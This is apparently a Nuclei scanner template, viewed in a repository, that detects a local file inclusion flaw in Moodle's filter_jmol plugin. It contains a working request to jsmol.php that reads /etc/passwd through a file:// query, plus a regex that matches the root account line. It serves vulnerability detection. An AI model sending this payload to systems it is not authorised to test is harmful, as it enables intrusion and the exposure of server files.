nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml

23 lines
494 B
YAML
Raw Normal View History

id: moodle-filter-jmol-lfi
2020-05-24 22:19:21 +00:00
info:
name: Moodle filter_jmol - LFI
author: madrobot
severity: high
description: Local file inclusion on Moodle.
tags: moodle,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
2020-05-24 22:19:21 +00:00
- 200
- type: regex
regex:
2020-05-24 22:19:21 +00:00
- "root:[x*]:0:0:"
part: body